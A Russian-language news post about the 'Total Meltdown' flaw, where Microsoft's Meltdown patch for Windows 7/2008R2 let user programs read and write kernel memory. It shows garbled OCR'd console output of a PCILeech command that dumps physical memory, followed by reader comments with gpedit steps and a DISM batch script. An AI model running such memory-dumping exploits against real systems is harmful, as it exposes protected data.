Патч от Meltdown привел к более критичной уязвимости Windows 7x64/2008R2
Патч Meltdown от Microsoft открыл еще большую брешь в безопасности в Windows 7/2008, позволяя любому пользовательскому приложению читать содержимое из ядра операционной системы и даже записывать данные в память ядра.
Шведский эксперт по ИТ-безопасности Ульф Фриск обнаружил эту уязвимость, работая над устройством PCILeech, созданном для проведения атак с прямым доступом к памяти (DMA) и дампу защищенной памяти операционной системы.
По словам эксперта, исправление Meltdown от Microsoft (для CVE-2017-5754), случайно перевернуло бит, который контролирует права доступа для памяти ядра.
Подробнее
as C:\Windows\system32\cmd.exe Microsoft Windows [Uersion 6.1.76011 Copyright <c> 2009 Microsoft Corporation. fill rights reserved. C:\Users\user>cd c:\pcileech c:\pcileech>pcileech dump -device totalmeItdown -out none -v -force TOTfiLMELTDOUN: Successfully exploited for physical memory access. Memory Map: START END «PAGES 0000000000001000 — 000000000009cf f f 0000009c 0000000000100000 - 000000001fffffff 0001ff00 0000000020200000 - 0000000040003fff 0001fe04 0000000040005000 — 00000000cc703fff 0008c6ff 0000000100000000 - 000000021e5 fffff 0011e600 Current fiction: Dumping Memory ficcess Mode: DMfi (hardware only> Progress: 8678 / 8678 <100x> Speed: 4339 MB/s Address: 0X000000021E600000 Pages read: 2009759 / 2221568 <90/> Pages failed: 211809 <9x> Memory Dump: Successful. c:\pcileech> SB Command Prompt Copyright <c> 2009 Microsoft Corporation. All rights reserved. C:\Users\user>cd c:\pcileech c:\pcileech>pcileech dump -device totalmeItdown -out mydump.raw -v -force TOTALMELTDOUN: Successfully exploited for physical memory access. Memory Map: START END «PAGES 0000000000001000 — 000000000009cf f f 0000009c 0000000000100000 - 000000001fffffff 0001ff00 0000000020200000 - 0000000040003fff 0001fe04 0000000040005000 — 00000000cc703fff 0008c6ff 0000000100000000 - 000000021e5 fffff 0011e600 Current Action: Dumping Memory Access Mode: DMA (hardware only> Progress: 8678 / 8678 (100x> Speed: 206 MB/s Address: 0X000000021E600000 Pages read: 2009759 / 2221568 (90/> Pages failed: 211809 (9X> Memory Dump: Successful. \pcileech>
Windows 7,Microsoft,Майкрософт,Meltdown
Еще на тему
хотя врядли.. мелкософт слишком интересная контора, что делает из просой и удобной программы.. нечто.. нечто убогое и крайне трудноюзабельное.
Нажмите Win + R.
Введите gpedit.msc и нажмите Enter.
Нажмите "Конфигурация компьютера".
Выберите "Административные шаблоны".
Нажмите "Все параметры".
Прокрутите вниз до пункта "Настройка автоматического обновления" и дважды щелкните запись.
Выберите "Включено" в верхнем левом углу.
Выберите "Уведомлять о загрузки и автоматической установки".
Нажмите "Применить".
если политик нет и у тебя хоум, то сочувствую, реестр не помогает.
Не надо сочувствовать, надо советовать запустить батник со следующим содержимым:
@echo off
pushd "%~dp0"
dir /b %SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~3*.mum >List.txt
dir /b %SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientTools-Package~3*.mum >>List.txt
for /f %%i in ('findstr /i . List.txt 2^>nul') do dism /online /norestart /add-package:"%SystemRoot%\servicing\Packages\%%i"
pause
После этого gpedit заработает.
Во время исследований он определённо ощущал решимость.